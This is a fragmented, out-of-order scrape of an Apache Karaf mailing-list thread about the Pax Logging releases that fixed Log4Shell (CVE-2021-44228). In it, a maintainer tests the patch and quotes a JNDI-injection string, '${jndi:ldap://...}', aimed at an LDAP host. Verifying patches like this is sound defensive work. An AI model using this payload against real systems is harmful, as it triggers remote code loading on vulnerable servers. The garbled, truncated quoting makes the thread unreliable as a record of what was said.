then:
> > >>>>
> > >>>> karaf@root()> log:log '${jndi:ldap://
> > >>> 10.39.192.99/cn=boom,dc=k8s,dc=forest
> > >>>> }'
> > >>>>
> > >>>> gave me this in logs:
> > >>>>
> > >
gt; It still expands ${java:version}. I checked that it shows with
> >>>> “system:property log4j.formatMsgNoLookup” true and there seems to be
> no
> >>>> %m{lookup} setting.
> >>>>
> >>>> I am using pax logging 2.0.8 which
4j?
--
https://bernd.eckenfels.net
From: Grzegorz Grzybek
Sent: Friday, December 10, 2021 1:43:00 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10
released
Hello
Actually, https://issues.apache.org/jira/browse/LOG4J2-
ontaining log4j 2.14.1 (I.e a
> > > version newer than 2.10).
> > >
> > > Any idea?
> > >
> > > Is it possible that the shaded pax-logging-log4j does not honor the
> > system
> > > property of log4j?
> > >
> > >
> > > --
> > > https://bern
rzegorz Grzybek
> >
> > pt., 10 gru 2021 o 13:28 Bernd Eckenfels
> > napisał(a):
> >
> > > Hello Grzegorz,
> > >
> > > Thanks a lot for the super quick reaction.
> > >
> > > I was rather confused to see that log messages can trigger a JNDI
> lookup
> > &
es not honor the system
> property of log4j?
>
>
> --
> https://bernd.eckenfels.net
>
> From: Grzegorz Grzybek
> Sent: Friday, December 10, 2021 1:43:00 PM
> To: dev@karaf.apache.org
> Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 an
> Grzegorz Grzybek :
> Hello
> Pax Logging 2.0.11 and 1.11.10 have been released with CVE-2021-44228 fix.
> *Log4j2 has been updated to version 2.15.0.*
Great! Thanks!
___
> From: Bernd Eckenfels
> Sent: Friday, December 10, 2021 11:26:19 PM
> To: dev@karaf.apache.org
> Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
>
> I am currently working on a description for a work around (specifying the
> syste
why but that means at least the POC
vectors don’t harm me.
--
https://bernd.eckenfels.net
From: Bernd Eckenfels
Sent: Friday, December 10, 2021 11:26:19 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
I am
, 2021 1:43:00 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
Hello
Actually, https://issues.apache.org/jira/browse/LOG4J2-3198 describes it in
details.
I was a bit surprised too - I knew about e.g., `${java:version}` if you
used
.net
>
> Von: Grzegorz Grzybek
> Gesendet: Friday, December 10, 2021 12:20:02 PM
> An: ops4j-announcem...@googlegroups.com <
> ops4j-announcem...@googlegroups.com>; Karaf Dev ;
> d...@felix.apache.org
> Betreff: [ANN][CVE-2021-44228
: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
Hello
Pax Logging 2.0.11 and 1.11.10 have been released with CVE-2021-44228 fix.
*Log4j2 has been updated to version 2.15.0.*
The changelog is available at GitHub:
https://github.com/ops4j/org.ops4j.pax.logging/milestone/72?closed=1
Hello
Pax Logging 2.0.11 and 1.11.10 have been released with CVE-2021-44228 fix.
*Log4j2 has been updated to version 2.15.0.*
The changelog is available at GitHub:
https://github.com/ops4j/org.ops4j.pax.logging/milestone/72?closed=1
kind regards
Grzegorz Grzybek
13 matches
Mail list logo